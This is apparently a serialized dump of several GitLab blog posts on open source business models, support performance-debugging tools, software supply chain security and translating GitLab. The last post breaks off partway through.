Data encryption: Start your security practices with the data\n\nSet policies to protect data based on certain trigger actions – like the creation\nof data or external sharing – or based on the level of data sensitivity. By making\nencryption a standard practice across all systems, you’re adding a layer of\nsecurity that requires identity-based authentication, which can give insight to\nwho is accessing your data and when. Moreover, any stolen data will only be\nuseful to hackers if it can be decrypted.\n\nCover image by [Kelly Sikkema](https://unsplash.com/@kellysikkema?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/collections/4571277/programming?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,865],{"slug":4926,"featured":6,"template":689},"third-party-code-risks","content:en-us:blog:third-party-code-risks.yml","Third Party Code Risks","en-us/blog/third-party-code-risks.yml","en-us/blog/third-party-code-risks",{"_path":4932,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4933,"content":4939,"config":4944,"_id":4946,"_type":14,"title":4947,"_source":16,"_file":4948,"_stem":4949,"_extension":19},"/en-us/blog/thoughts-on-open-source",{"title":4934,"description":4935,"ogTitle":4934,"ogDescription":4935,"noIndex":6,"ogImage":4936,"ogUrl":4937,"ogSiteName":673,"ogType":674,"canonicalUrls":4937,"schema":4938},"What to consider with an open source business model","CEO Sid Sijbrandij discusses the role of transparency and contribution in an open source business model.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682919/Blog/Hero%20Images/opensourcecover.jpg","https://about.gitlab.com/blog/thoughts-on-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What to consider with an open source business model\",\n        \"author\": 
[{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2019-07-05\",\n      }",{"title":4934,"description":4935,"authors":4940,"heroImage":4936,"date":4941,"body":4942,"category":10,"tags":4943},[1273],"2019-07-05","\nAn open source business model used to be relatively rare but successes at companies like Red Hat and our own have changed that. As the idea of open source continues to gain traction with startups, our CEO [Sid Sijbrandij](/company/team/#sytses) talked with [OSS Capital](https://oss.capital) founder Joseph “JJ” Jacks about some of the changing – and nuanced – requirements to play in this complicated and competitive space.\n\n## How to build a business model for open source software businesses\n\nOpen source has always required a social contract between the owners of the project and the community that uses and contributes to it, Sid explains, and that’s something GitLab benefited from when the company was experimenting with the idea of [how to get paid](/blog/monetizing-and-being-open-source/). But today, with an [“open core” business model](/blog/gitlab-is-open-core-github-is-closed-source/) involving both open source and proprietary code, there’s another level, one where the community can have a much bigger voice on releases. “How much of what you make ends up in the open source and how much is proprietary?” Sid asks. “We try to find a good balance then when we go for a few releases where we're a bit weak on the open source side, people will post comments on our blog post and we can point to the stuff that's coming down the pipe. The wider community keeps us honest.”\n\nJJ, whose company is focused on investing in commercial open source startups, asks Sid about the ways open source licensing has changed. 
It’s a broad landscape, Sid offers: “You can go from the free software movement to open source to open core to these new licenses that are now made by Redis and Mongo and Confluent, the so-called non-compete licenses, which say it's kind of open source except if you're a hyper cloud, then you have to pay us.”\n\nThe “freemium” business model has also come along. “(That) makes it very easy to get trials and you can use it for free for a long time, but it's commercial. And then you have the completely proprietary Oracle light model. So licensing is much more of a spectrum today.”\n\n> The wider community keeps us honest.\n\n## Time to contribute\n\nThe spectrum of licensing isn’t necessarily a bad thing. Sid points to the free software movement that requires a user to contribute as a positive sign, but admits there is still a long way to go before this behavior is second nature. Companies try to put restrictions in, or to enforce things via copyright, Sid says, “but we’re not there yet, not by a long stretch. Lots of car manufacturers don’t contribute back to Linux so please start doing that everyone.”\n\nOf course, contributions from the community can only take a company so far. “Open core allowed us to compete with the proprietary vendors,” Sid says. “GitLab would not have survived as an open source project because open source projects sometimes implode under their popularity. There are some great examples of projects that did well – Kubernetes, Linux, and PostgreSQL – but without our business model we would not be able to compete at this point in this market with Microsoft and Atlassian.”\n\n> Open core allowed us to compete with the proprietary vendors.\n\n## Transparency in all things\n\nJJ wonders how much transparency and expectation setting have helped GitLab as an open core company, and Sid’s quick to point out it’s essential. 
“[Transparency](https://handbook.gitlab.com/handbook/values/#transparency) is in our top three values and we started with that because we didn’t want to alienate the wider community.” Transparency shortens the feedback loop and makes it more straightforward to deal with mistakes or challenging situations. When we [decided to merge both of GitLab’s code bases](/blog/merging-ce-and-ee-codebases/), we did it openly and honestly, wrote a blog post about it, and then waited to see how it was received. “I think by being transparent about our plan up front, what could have turned into a big flame war was a really positive experience for both the people at the company working really hard on this project, but also the wider community feeling like we take their interests seriously. And if we would have made a mistake, this was a proposal. They could have just said, ‘Okay, you're making a mistake here and there,’ and we could have fixed it before people were upset, and we lost trust.”\n\nWould Sid recommend “transparency first” to a startup open core company? Absolutely and it has to be there from the beginning, he says. “Values are really hard to introduce later in a company. I'm pushing for a bit more transparency now, and it's super, super, super, super hard. So, if you plan to do it, do it from the start, and (understand) it feels very counterintuitive to be open. And there are some areas where it's naturally harder to be as transparent. Security comes to mind. So, it's a daily struggle. People see that it works, but it requires effort at any layer of the company to actually do it, but I'm really proud of how far we've come.”\n\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or a discussion of other things related to GitLab. 
Read [other posts in the series here](/blog/tags.html#pick-your-brain)._\n\nCover image by [Natasha Miller](https://unsplash.com/@tashography?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com)\n{: .note}\n",[267,779,9,9],{"slug":4945,"featured":6,"template":689},"thoughts-on-open-source","content:en-us:blog:thoughts-on-open-source.yml","Thoughts On Open Source","en-us/blog/thoughts-on-open-source.yml","en-us/blog/thoughts-on-open-source",{"_path":4951,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4952,"content":4958,"config":4964,"_id":4966,"_type":14,"title":4967,"_source":16,"_file":4968,"_stem":4969,"_extension":19},"/en-us/blog/three-new-support-tools",{"title":4953,"description":4954,"ogTitle":4953,"ogDescription":4954,"noIndex":6,"ogImage":4955,"ogUrl":4956,"ogSiteName":673,"ogType":674,"canonicalUrls":4956,"schema":4957},"We've open sourced 3 tools to help troubleshoot system performance","Say hello to the open source tools our Support team is using to better summarize customer performance data – and find out how they can help you.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670405/Blog/Hero%20Images/open_source_tools.jpg","https://about.gitlab.com/blog/three-new-support-tools","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We've open sourced 3 tools to help troubleshoot system performance\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Will Chandler\"},{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-07-24\",\n      }",{"title":4953,"description":4954,"authors":4959,"heroImage":4955,"date":4961,"body":4962,"category":801,"tags":4963},[4960,927],"Will Chandler","2019-07-24","\nOur self-managed customers often encounter issues related to performance, or the time it takes to execute something. 
In the past, the [Support team](/handbook/support/) had to pull data from disparate sources and cobble it together in order to analyze performance-related issues.\n\n“We’re dealing with someone else’s computer on support, so we have to be able to handle environments with limited observability,” says [Will Chandler](/company/team/#wchandler), senior support engineer. “We’re at the mercy of their infrastructure. That’s why the team has made tools to reduce the friction.”\n\n“With [GitLab.com](/pricing/), we have all of this fancy tooling that helps us collect performance data,” says [Lee Matos](/company/team/#leematos), support engineering manager. “But when we’re working with customers, we need to be ready to bring lightweight tools that don’t require a lot of setup that we can use based on what they have in place.”\n\nThe Support team is working on becoming more data driven by using three new tools designed to aggregate and summarize performance data for self-managed customers. A focus on data-driven decision-making improves the customer relationship and demonstrates our commitment to making performance a key feature of GitLab.\n\nWe'll look at three open source tools created by GitLab Self-Managed Support. Strace parser is a general tool that could be of use to anyone, while JSON Stats and GitLabSOS are tailored to GitLab, but could be easily modified.\n\n## 1. [Strace parser](https://gitlab.com/gitlab-com/support/toolbox/strace-parser)\n\n[Strace](https://gitlab.com/strace/strace) is a commonly used debugging and diagnostic tool in Linux that captures information about what’s happening inside processes running on our customers’ environments.\n\nUnlike [newer](http://man7.org/linux/man-pages/man1/perf.1.html) and [more powerful](https://github.com/iovisor/bpftrace) tracing tools, strace adds [significant overhead to a process](http://www.brendangregg.com/blog/2014-05-11/strace-wow-much-syscall.html). 
However, strace is generally available even on very old versions of Linux.\n\nAn strace of a single-threaded program is linear, but following the threads of execution quickly gets difficult when there are many processes being captured. At GitLab Support we are typically tracing [Unicorn](https://bogomips.org/unicorn/) workers or [Gitaly](https://gitlab.com/gitlab-org/gitaly), which are highly concurrent, resulting in hundreds of process IDs being traced and hundreds of thousands of lines of output from traces only a few seconds long.\n\nWill built [strace parser](https://gitlab.com/gitlab-com/support/toolbox/strace-parser) for these types of use cases. Strace parser summarizes the most meaningful processing data delivered by an strace in a more accessible format, allowing users to find the critical sections of the data quickly.\n\nThe next two examples are from a GitLab customer that was using a very slow file system to host their .gitconfig file, which was a major performance bottleneck. But it was not immediately clear what was happening from the perspective of a user trying to troubleshoot. By running an strace on Gitaly, we were able to get a better understanding of why the system was so slow.\n\n```\n3694  13:45:06.207369 clock_gettime(CLOCK_MONOTONIC, {3016230, 201254200}) = 0 \u003C0.000015>\n3694  13:45:06.207409 futex(0x7f645bb49664, FUTEX_WAIT_BITSET_PRIVATE, 192398, {3016230, 299906871}, ffffffff \u003Cunfinished ...>\n3542  13:45:06.209616 \u003C... futex resumed> ) = -1 ETIMEDOUT (Connection timed out) \u003C0.005236>\n3542  13:45:06.209639 futex(0x1084ff0, FUTEX_WAKE, 1) = 1 \u003C0.000023>\n3510  13:45:06.209673 \u003C... futex resumed> ) = 0 \u003C0.002909>\n3542  13:45:06.209701 futex(0xc420896548, FUTEX_WAKE, 1 \u003Cunfinished ...>\n3510  13:45:06.209710 pselect6(0, NULL, NULL, NULL, {0, 20000}, NULL \u003Cunfinished ...>\n16780 13:45:06.209740 \u003C... futex resumed> ) = 0 \u003C0.002984>\n3542  13:45:06.209749 \u003C... 
futex resumed> ) = 1 \u003C0.000043>\n16780 13:45:06.209776 pselect6(0, NULL, NULL, NULL, {0, 3000}, NULL \u003Cunfinished ...>\n3542  13:45:06.209787 futex(0xc420053548, FUTEX_WAKE, 1 \u003Cunfinished ...>\n16780 13:45:06.209839 \u003C... pselect6 resumed> ) = 0 (Timeout) \u003C0.000056>\n3544  13:45:06.209853 \u003C... futex resumed> ) = 0 \u003C0.003148>\n3542  13:45:06.209861 \u003C... futex resumed> ) = 1 \u003C0.000069>\n3510  13:45:06.209868 \u003C... pselect6 resumed> ) = 0 (Timeout) \u003C0.000151>\n3544  13:45:06.209915 epoll_ctl(4\u003Canon_inode:[eventpoll]>, EPOLL_CTL_DEL, 181\u003CUNIX:[164869291]>, 0xc42105bb14 \u003Cunfinished ...>\n16780 13:45:06.210076 write(1\u003Cpipe:[55447]>, \"time=\\\"2019-02-14T18:45:06Z\\\" level=warning msg=\\\"health check failed\\\" error=\\\"rpc error: code = DeadlineExceeded desc = context deadline exceeded\\\" worker.name=gitaly-ruby.4\\n\", 170 \u003Cunfinished ...>\n3544  13:45:06.210093 \u003C... epoll_ctl resumed> ) = 0 \u003C0.000053>\n3542  13:45:06.210101 futex(0x1089020, FUTEX_WAIT, 0, {0, 480025102} \u003Cunfinished ...>\n3510  13:45:06.210109 pselect6(0, NULL, NULL, NULL, {0, 20000}, NULL \u003Cunfinished ...>\n16780 13:45:06.210153 \u003C... 
write resumed> ) = 170 \u003C0.000064>\n3544  13:45:06.210163 close(181\u003CUNIX:[164869291]> \u003Cunfinished ...>\n```\n\nThis strace delivers more than 300,000 lines about the different Gitaly processes running on this customer’s GitLab environment, making it challenging to decipher the flow of execution.\n{: .note.text-center}\n\n“In this case, we can use strace-parser to say, ‘Just give me all the files that were opened, and sort them by how long it took to open,’” says Will.\n\n```\n$ strace-parser trace.txt files --sort duration\n\nFiles Opened\n\n      pid      dur (ms)       timestamp            error         file name\n  -------    ----------    ---------------    ---------------    ---------\n    24670      5203.999    13:45:16.152985           -           /efs/gitlab/home/.gitconfig\n    24859      5296.580    13:45:23.367482           -           /efs/gitlab/home/.gitconfig\n    24584      5279.810    13:45:09.286019           -           /efs/gitlab/home/.gitconfig\n    24666      5276.975    13:45:16.079697           -           /efs/gitlab/home/.gitconfig\n    24667      5255.649    13:45:16.101009           -           /efs/gitlab/home/.gitconfig\n    14871      2594.364    13:45:18.762347           -           /efs/gitlab/home/.gitconfig\n    24885      2440.635    13:45:26.224189           -           /efs/gitlab/home/.gitconfig\n    24886      2432.980    13:45:26.231009           -           /efs/gitlab/home/.gitconfig\n    24656        55.873    13:45:15.916836        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/objects/info/alternates\n    24688        42.764    13:45:21.522789        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/objects/info/alternates\n     3709        39.631    13:45:07.816618           -           /efs/gitlab/home/.gitconfig\n    24583        37.959    13:45:09.218283           -           /efs/gitlab/home/.gitconfig\n```\n\nBy summarizing the data in this way, we see multiple 
files that took 2-5 seconds to open, which is several orders of magnitude slower than expected.\n{: .note.text-center}\n\n“If it’s a particularly busy server and we’re performing these actions 50 times a second, 100 times a second, that adds up really fast,” says Will. “Strace-Parser lets you drill down quickly, and say, ‘OK, this specific thing we’re doing is super slow.’”\n\n### Get a closer look at processes using strace-parser\n\nStrace-Parser can also be used to drill down into details of a process.\n\nThe previous output showed PID 24670 is one of the slower processes, so we use the parser to understand how this slow call impacted the performance of the process overall.\n\n```\n$ strace-parser trace.txt pid 24670\n\nPID 24670\n\n  271 syscalls, active time: 5303.438ms, user time: 34.662ms, total time: 5338.100ms\n  start time: 13:45:16.116671    end time: 13:45:21.454771\n\n  syscall                 count    total (ms)      max (ms)      avg (ms)      min (ms)    errors\n  -----------------    --------    ----------    ----------    ----------    ----------    --------\n  open                       29      5223.073      5203.999       180.106         0.031    ENOENT: 9\n  read                       25        46.303        28.747         1.852         0.031\n  access                     11         6.948         4.131         0.632         0.056    ENOENT: 3\n  lstat                       6         5.116         2.130         0.853         0.077    ENOENT: 4\n  mmap                       32         3.868         0.485         0.121         0.028\n  openat                      2         3.757         2.934         1.878         0.823\n  fstat                      28         3.395         0.272         0.121         0.033\n  munmap                     11         2.551         0.929         0.232         0.056\n  rt_sigaction               59         2.548         0.121         0.043         0.024\n  close                      22         2.375         0.279        
 0.108         0.032\n  mprotect                   14         0.927         0.174         0.066         0.032\n  execve                      1         0.621         0.621         0.621         0.621\n  brk                         6         0.595         0.210         0.099         0.046\n  stat                        8         0.388         0.082         0.048         0.027    ENOENT: 3\n  getdents                    4         0.361         0.138         0.090         0.044\n  rt_sigprocmask              3         0.141         0.059         0.047         0.040\n  write                       1         0.101         0.101         0.101         0.101\n  dup2                        3         0.090         0.032         0.030         0.026\n  arch_prctl                  1         0.077         0.077         0.077         0.077\n  getrlimit                   1         0.062         0.062         0.062         0.062\n  getcwd                      1         0.044         0.044         0.044         0.044\n  set_robust_list             1         0.035         0.035         0.035         0.035\n  set_tid_address             1         0.032         0.032         0.032         0.032\n  setpgid                     1         0.030         0.030         0.030         0.030\n  ---------------\n\n  Program Executed: /opt/gitlab/embedded/bin/git\n  Args: [\"--git-dir\" \"/nfs/gitlab/gitdata/repositories/group/project.git\" \"cat-file\" \"--batch-check\"]\n\n  Parent PID:  3563\n\n  Slowest file open times for PID 24670:\n\n    dur (ms)       timestamp            error         file name\n  ----------    ---------------    ---------------    ---------\n    5203.999    13:45:16.152985           -           /efs/gitlab/home/.gitconfig\n       5.420    13:45:16.143520           -           /nfs/gitlab/gitdata/repositories/group/project.git/config\n       2.959    13:45:21.372776           -           /efs/gitlab/home/.gitconfig\n       2.934    13:45:21.401073           -           
/nfs/gitlab/gitdata/repositories/group/project.git/refs/\n       2.736    13:45:21.417333        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/info/grafts\n       2.683    13:45:21.421558           -           /nfs/gitlab/gitdata/repositories/group/project.git/objects/b7/ef5eba3a425af1e2a9cf6f51cb87454b6e1ad1\n       2.430    13:45:21.407170        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/objects/info/alternates\n       0.992    13:45:21.420213        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/shallow\n       0.823    13:45:21.405535           -           /nfs/gitlab/gitdata/repositories/group/project.git/objects/pack\n       0.275    13:45:21.380382           -           /nfs/gitlab/gitdata/repositories/group/project.git/config\n```\n\nThe output shows the time this process spent working was dominated by the slow file open. This data points the Support team in the right direction for fixing the underlying issue.\n{: .note.text-center}\n\nStrace itself has the `-c` flag which provides a similar summary, but its utility is limited when multiple processes are traced as it cannot break out per-process statistics.  Strace-Parser breaks these down to the PID level, and can also include the details of parent and child processes on demand.\n\n“In this case Will has identified an interesting area for our customer and then very quickly anchored it in the fact that when we look at that one spot it was slow,” says Lee. “When we’re debugging, having this data available really helps us pinpoint the problem for our customers so we can give them answers.”\n\nThe typical GitLab deployment has many different processes and services running at a time, which can create dozens of different child processes, so there is a large surface area for potential errors or slowness to occur.\n\nStrace-Parser is an open source, generic tool that anyone can use to better understand their strace data.\n\n## 2. 
[JSON Stats](https://gitlab.com/gitlab-com/support/toolbox/json_stats)\n\nWill also built [JSON Stats](https://gitlab.com/gitlab-com/support/toolbox/json_stats), a script that pulls performance statistics for different logs from the customer’s GitLab environment and summarizes the results in an easy-to-interpret table.\n\n```\nMETHOD                             COUNT     RPS     PERC99     PERC95     MEDIAN         MAX        MIN          SCORE    % FAIL\nFetchRemote                         2542    0.17  962176.08  130154.88   36580.23  4988513.00    1940.45  2445851585.19      1.06\nFindAllTags                         5200    0.34   30000.37   11538.63    1941.84    30006.23     252.10   156001924.68      1.63\nFindCommit                          3506    0.23   20859.98   16622.78   10841.86    30001.59    2528.67    73135073.75      0.23\nFindAllRemoteBranches               1664    0.11   20432.93   12996.75    8606.60   405503.94    1430.84    34000396.10      0.00\nAddRemote                           2603    0.17   10001.03    8094.97     825.46    10007.46     228.13    26032673.70      3.00\nFindLocalBranches                   2535    0.16   10004.68   10002.90    9051.91    10036.16    1260.89    25361871.05     34.32\n```\n\nThis output shows that we’re calling the “FindLocalBranches” service 2500+ times, and it’s failing 34% of the time.\n{: .note.text-center}\n\nThe Support team can use JSON Stats to ground their findings in evidence when evaluating overall performance for a customer. It's the same concept as strace-parser. Can we pivot the information in a way that it clearly becomes meaningful data?\n\n“It’s a quick way of extracting data that you can give to a customer. 
Instead of saying ‘Look, this failed once,’ we can say, ‘Look, this is failing a third of the time and that suggests there’s a problem with X,’” says Will.\n\nIn the sample output we see that JSON Stats is working with Gitaly logs, but the tool is nimble enough to work on the logs from all the heavy components of GitLab, including Rails, which runs the UI, and Sidekiq, which works on background tasks.\n\n“Some of our customers are very sophisticated and may have advanced monitoring that could give us this information. But we wanted to build a tool that would help us align and easily standardize on how we can get this performance information for customers that don’t have an advanced monitoring setup,” says Lee.\n\nWhile this specific tool isn't as helpful for people outside of the GitLab community, hopefully it helps to inspire others to consider how they are drawing conclusions, and how they can speed that process up.\n\n### Benchmarking with JSON Stats\n\nWill is building a future iteration of JSON Stats that will compare the performance of a customer’s GitLab instance with GitLab.com.\n\n![JSON benchmarking table](https://about.gitlab.com/images/blogimages/support-tools-update.png){: .shadow}\n\nBenchmarking the performance of GitLab.com (the first row) with the customer environment (second row), and the ratio between the two (third row). We can see that in the worst case, the customer’s 99th percentile FindCommit latency was almost eight times slower than it was on GitLab.com.\n{: .note.text-center}\n\n“Our vision here is to give accountability to our customers. We’re going to treat GitLab.com as the pinnacle experience for GitLab,” says Lee. “We want to use JSON Stats with benchmarking to help us understand how far away our customers are from GitLab.com.”\n\nLee and Will are still assessing how to set the target range for the customer’s instance of GitLab. 
But considering the wealth of resources allocated to GitLab.com, any self-managed customer that is performing within 5-10% of GitLab.com would be considered hugely successful.\n\n## 3. [GitLab SOS](https://gitlab.com/gitlab-com/support/toolbox/gitlabsos)\n\nWhen a customer encounters an issue, but they are unsure of what they problem is, they can run [GitLab SOS](https://gitlab.com/gitlab-com/support/toolbox/gitlabsos), created by support engineer [Cody West](/company/team/#codyww), to create a snapshot of different activities happening on their system. It's been so helpful in debugging GitLab that it's being added into our [Omnibus delivery](https://gitlab.com/gitlab-org/omnibus-gitlab/merge_requests/3430).\n\nBy capturing so much data about a moment in time during or shortly after encountering a problem, the support team is able to work asynchronously to troubleshoot on behalf of the customer.\n\n```\ncpuinfo              getenforce           iotop                netstat              opt                  sestatus             unicorn_stats\ndf_h                 gitlab_status        lscpu                netstat_i            pidstat              systemctl_unit_files uptime\ndmesg                gitlabsos.log        meminfo              nfsiostat            ps                   tainted              var\netc                  hostname             mount                nfsstat              sar_dev              ulimit               vmstat\nfree_m               iostat               mpstat               ntpq                 sar_tcp              uname\n```\n\nGitLab SOS works best if the script is run while an issue is occurring, or moments after, but even if the window of opportunity is missed you can still successfully gather information to diagnose the problem.\n{: .note.text-center}\n\n“If a customer is sharp, they may know what problems to look for already,” says Lee. 
“But if a customer is scared and they don’t know what to look for, then they can lean on a tool like GitLab SOS and learn from GitLab SOS. We even have some sharp customers that will generate the SOS output and begin to troubleshoot themselves because of the comprehensive overview it provides.”\n\n## These new tools drive data-driven decision-making in Support\n\nTools like strace-parser, JSON Stats, and GitLab SOS provide the Support team and GitLab customers with critical evidence about performance. By letting the data drive decision-making, the Support team is able to identify problems faster and quickly start debugging customer environments. Performance is a key feature of GitLab, and by filling our toolbox with data-driven solutions we can ensure greater [transparency](https://handbook.gitlab.com/handbook/values/#transparency) between GitLab and our customers.\n\nLearn more about debugging from a support engineering perspective in a GitLab Unfiltered video.\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/9W6QnpYewik\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\nCover photo by [Diogo Nunes](https://unsplash.com/@dialex?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/tools?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,1099,803],{"slug":4965,"featured":6,"template":689},"three-new-support-tools","content:en-us:blog:three-new-support-tools.yml","Three New Support 
Tools","en-us/blog/three-new-support-tools.yml","en-us/blog/three-new-support-tools",{"_path":4971,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4972,"content":4978,"config":4984,"_id":4986,"_type":14,"title":4987,"_source":16,"_file":4988,"_stem":4989,"_extension":19},"/en-us/blog/top-challenges-to-securing-the-software-supply-chain",{"title":4973,"description":4974,"ogTitle":4973,"ogDescription":4974,"noIndex":6,"ogImage":4975,"ogUrl":4976,"ogSiteName":673,"ogType":674,"canonicalUrls":4976,"schema":4977},"Top challenges to securing the software supply chain","Learn what organizations should keep in mind while incorporating software supply chain security into their software development lifecycle.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668437/Blog/Hero%20Images/faster-cycle-times.jpg","https://about.gitlab.com/blog/top-challenges-to-securing-the-software-supply-chain","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Top challenges to securing the software supply chain\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chandler Gibbons\"}],\n        \"datePublished\": \"2022-11-07\",\n      }",{"title":4973,"description":4974,"authors":4979,"heroImage":4975,"date":4981,"body":4982,"category":865,"tags":4983},[4980],"Chandler Gibbons","2022-11-07","\nOrganizations are feeling the pressure to integrate security into their software development lifecycles, and federal and industry mandates mean [the days of security as a “nice to have” are officially over](/blog/gitlabs-2022-global-devsecops-survey-security-is-the-top-concern-investment/). Understanding the threats that can emerge across the entire [software supply chain](/blog/gitlab-supply-chain-security/) is integral to this effort. 
But assembling a complete DevSecOps strategy that governs how code, applications, and infrastructure are protected across the software supply chain is no easy feat.\n\nWhat follows are a few of the biggest challenges that organizations should keep in mind while incorporating software supply chain security into their software development lifecycle.\n\n## The full attack surface is huge\nMost modern cloud-native applications are developed using a multitude of open source and third-party components, creating a tangle of direct and indirect dependencies. But vulnerabilities in open source software, such as the [Log4Shell vulnerability](https://www.cisa.gov/uscert/ncas/alerts/aa21-356a), are only one part of the software supply chain’s full attack surface.\n\nOther potential attack vectors include flaws in in-house code, misconfigured [CI/CD](/topics/ci-cd/) pipelines, secret information inadvertently committed to source code repositories, and even undiscovered vulnerabilities in web APIs. Recognizing all of the ways attackers can exploit the software supply chain is an overwhelming task — in fact, it’s impossible for teams to manually monitor all of these vectors, remediate the threats, and do their day jobs at the same time. DevSecOps teams should be aware of the broad categories of threats to watch out for and the tools and processes, such as version control, multi-factor authentication, and automated security scanning, that are effective at preventing or identifying attacks at each stage of the software supply chain.\n\n## Zero trust is easier said than done\nThe key to ensuring security during each step in the software supply chain is to enforce zero trust: essentially, scrutinizing everything and everyone, whether human, machine, open source component, or application configuration, for potential threats. 
IBM’s [Cost of a Data Breach 2022 report](https://www.ibm.com/reports/data-breach) found that investments in zero trust are paying off: Organizations that implemented zero trust saved nearly $1 million in average breach costs compared to organizations without zero trust. However, a majority of surveyed organizations had not yet deployed a zero trust security architecture, according to the report. It’s important to remember that [zero trust is not a single product or service](/blog/why-devops-and-zero-trust-go-together/) — it is a strategy applied to a security framework. For securing the software supply chain, that means enforcing zero trust principles at each step in the chain.\n\n## Launching a cyber attack is getting easier\nSoftware supply chain attacks were once the domain of experienced cybercriminals who had the skills to identify and exploit vulnerabilities or to build and inject malicious software code into applications. However, today’s cybercriminals have the benefit of learning from their predecessors. Once a piece of malicious software is out in the world, attackers can reuse and modify it for their own purposes. The [Mirai malware](https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html), for example, continues to live on even after its creators were caught and sentenced in 2018, with new variants emerging each year that continue to pose risks to vulnerable network devices. 
Today’s hackers also have a broader arsenal of [malicious tools](https://www.cisa.gov/uscert/ncas/alerts/AA18-284A) at their disposal, such as credential stealers and lateral movement tools, that make it easier than ever to launch software supply chain attacks.\n\n## Assess your organization’s threat landscape\nTaking steps to recognize threat vectors in the software supply chain ensures that the software development lifecycle remains an engine of innovation and drives benefits for the business, rather than being a potential backdoor for attackers.\n\n[Download our field guide](https://page.gitlab.com/resources-ebook-guide-to-threat-vectors.html) to better understand the types of threat vectors that can emerge at each stage of the software supply chain and how to mitigate those risks.\n",[865,9],{"slug":4985,"featured":6,"template":689},"top-challenges-to-securing-the-software-supply-chain","content:en-us:blog:top-challenges-to-securing-the-software-supply-chain.yml","Top Challenges To Securing The Software Supply Chain","en-us/blog/top-challenges-to-securing-the-software-supply-chain.yml","en-us/blog/top-challenges-to-securing-the-software-supply-chain",{"_path":4991,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4992,"content":4997,"config":5002,"_id":5004,"_type":14,"title":5005,"_source":16,"_file":5006,"_stem":5007,"_extension":19},"/en-us/blog/translating-gitlab",{"title":4993,"description":4994,"ogTitle":4993,"ogDescription":4994,"noIndex":6,"ogImage":1348,"ogUrl":4995,"ogSiteName":673,"ogType":674,"canonicalUrls":4995,"schema":4996},"Help us speak your language!","GitLab is available in many languages, but there's always more translation work to be done. 
Here's how you can contribute to translating GitLab.","https://about.gitlab.com/blog/translating-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Help us speak your language!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-01-08\",\n      }",{"title":4993,"description":4994,"authors":4998,"heroImage":1348,"date":4999,"body":5000,"category":10,"tags":5001},[704],"2019-01-08","\nOne of the lesser-known features of GitLab is that it has been translated into many languages by community members. If you have only seen GitLab in (American) English, you can go to your [Profile page](https://gitlab.com/profile) and change your **Preferred language** to see it in another language.\n\n![Selecting preferred language](https://about.gitlab.com/images/blogimages/translation-blog/preferred_language_chinese.png){: .shadow.small.center}\n\n![GitLab in Chinese](https://about.gitlab.com/images/blogimages/translation-blog/gitlab_in_chinese.png){: .shadow.small.center}\n\nWe are proud of the work done by so many dedicated community members to help translate GitLab, but this is ongoing work, and we also have many languages that are just getting started with translation. That's where you come in!\n\n## Why translate GitLab?\n\nSome may say that GitLab is used by technical people who are already used to using a lot of different software in English, and translation is not really necessary. That may be true, but having the software available in local languages that people are more comfortable with lowers the barrier to entry not only for users, but for contributors too. 
Maybe it's because GitLab is an [all-remote company](/blog/the-case-for-all-remote-companies/) with [employees in nearly 50 countries](/company/team/), but GitLab team-members appreciate the benefits of localized software in local communities.\n\n## How is GitLab translated and how do I start contributing?\n\nThe translation is managed at [translate.gitlab.com](https://translate.gitlab.com/) using [Crowdin](https://crowdin.com/). First, a phrase (e.g. one that appears in the GitLab user interface or in error messages) needs to be internationalized before it can be translated. The internationalized phrases are then made available for translations on [translate.gitlab.com](https://translate.gitlab.com/). As each phrase is translated, it is added to the translation file, and will then be merged into future releases. You can find more details on how GitLab is translated in the [Translate GitLab documentation](https://docs.gitlab.com/ee/development/i18n/).\n\nAs you can see in the [translation activity stream](https://translate.gitlab.com/project/gitlab-ee/activity_stream), the majority of translations are contributed by community members. You're probably already familar with GitLab's motto, \"Everyone can contribute,\" and contributing translation is even easier than contributing code.  All you need is an account on [CrowdIn](https://crowdin.com/) plus a browser, and you are ready to translate GitLab to a language of your choice. So if you're looking for ways to contribute and know other languages, translation is a great place to get started.\n\nDuring the [GitLab Hackathon](/community/hackathon/) in September, one of our [Core Team](/community/core-team/) members [Hannes Rosenögger](https://gitlab.com/haynes) presented a session on translation where he walked through how community members can contribute. 
